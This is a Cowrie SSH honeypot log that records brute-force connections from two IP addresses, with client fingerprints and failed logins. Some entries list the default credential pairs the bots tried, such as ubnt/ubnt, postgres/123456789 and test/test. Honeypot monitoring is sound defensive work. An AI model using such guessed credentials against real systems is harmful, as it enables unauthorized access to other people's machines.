{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:43:21.704893Z","src_ip":"212.227.235.229","session":"fbf8d5f01eff"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:43:23.118372Z","src_ip":"212.227.235.229","session":"c910ebf3f39d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41852,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1a340863a76","protocol":"ssh","message":"New connection: 212.227.125.160:41852 (1.2.3.4:22) [session: a1a340863a76]","sensor":"my-vps","timestamp":"2025-08-31T04:43:24.640529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:43:24.939321Z","src_ip":"212.227.125.160","session":"a1a340863a76"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:43:24.940267Z","src_ip":"212.227.125.160","session":"a1a340863a76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54216,"dst_ip":"1.2.3.4","dst_port":22,"session":"08f359888934","protocol":"ssh","message":"New connection: 212.227.125.160:54216 (1.2.3.4:22) [session: 08f359888934]","sensor":"my-vps","timestamp":"2025-08-31T04:43:25.300237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:43:25.300803Z","src_ip":"212.227.125.160","session":"08f359888934"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:43:25.490048Z","src_ip":"212.227.125.160","session":"08f359888934"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:25.492561Z","src_ip":"212.227.235.229","session":"c910ebf3f39d"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:26.059432Z","src_ip":"212.227.125.160","session":"08f359888934"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:26.768258Z","src_ip":"212.227.235.229","session":"c910ebf3f39d"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456789","message":"login attempt [postgres/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:27.222395Z","src_ip":"212.227.125.160","session":"a1a340863a76"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:27.249907Z","src_ip":"212.227.125.160","session":"08f359888934"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:28.749333Z","src_ip":"212.227.125.160","session":"a1a340863a76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41388,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0f80d6f5c5a","protocol":"ssh","message":"New connection: 212.227.235.229:41388 (1.2.3.4:22) [session: d0f80d6f5c5a]","sensor":"my-vps","timestamp":"2025-08-31T04:43:29.393374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:43:29.417300Z","src_ip":"212.227.235.229","session":"d0f80d6f5c5a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:43:29.728801Z","src_ip":"212.227.235.229","session":"d0f80d6f5c5a"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:30.329515Z","src_ip":"212.227.235.229","session":"fbf8d5f01eff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53554,"dst_ip":"1.2.3.4","dst_port":22,"session":"b284ac8be864","protocol":"ssh","message":"New connection: 212.227.125.160:53554 (1.2.3.4:22) [session: b284ac8be864]","sensor":"my-vps","timestamp":"2025-08-31T04:43:31.418454Z"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:32.546950Z","src_ip":"212.227.235.229","session":"d0f80d6f5c5a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:43:32.639096Z","src_ip":"212.227.125.160","session":"b284ac8be864"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:43:32.639825Z","src_ip":"212.227.125.160","session":"b284ac8be864"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:33.805295Z","src_ip":"212.227.235.229","session":"d0f80d6f5c5a"}
{"eventid":"cowrie.session.closed","duration":"13.1","message":"Connection lost after 13.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:43:34.527383Z","src_ip":"212.227.235.229","session":"fbf8d5f01eff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47382,"dst_ip":"1.2.3.4","dst_port":22,"session":"6592d37e9fb2","protocol":"ssh","message":"New connection: 212.227.125.160:47382 (1.2.3.4:22) [session: 6592d37e9fb2]","sensor":"my-vps","timestamp":"2025-08-31T04:43:35.924589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:43:35.926208Z","src_ip":"212.227.125.160","session":"6592d37e9fb2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:43:36.108614Z","src_ip":"212.227.125.160","session":"6592d37e9fb2"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:43:36.659914Z","src_ip":"212.227.125.160","session":"6592d37e9fb2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41390,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b99fd89b67b","protocol":"ssh","message":"New connection: 212.227.235.229:41390 (1.2.3.4:22) [session: 2b99fd89b67b]","sensor":"my-vps","timestamp":"2025-08-31T04:43:36.858931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:43:36.864382Z","src_ip":"212.227.235.229","session":"2b99fd89b67b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:43:37.137477Z","src_ip":"212.227.235.229","session":"2b99fd89b67b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41402,"dst_ip":"1.2.3.4","dst_port":22,"session":"469b90b4956c","protocol":"ssh","message":"New connection: 212.227.235.229:41402 (1.2.3.4:22) [session: 469b90b4956c]","sensor":"my-vps","timestamp":"2025-08-31T04:43:37.362516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:43:37.578621Z","src_ip":"212.227.235.229","session":"469b90b4956c"}
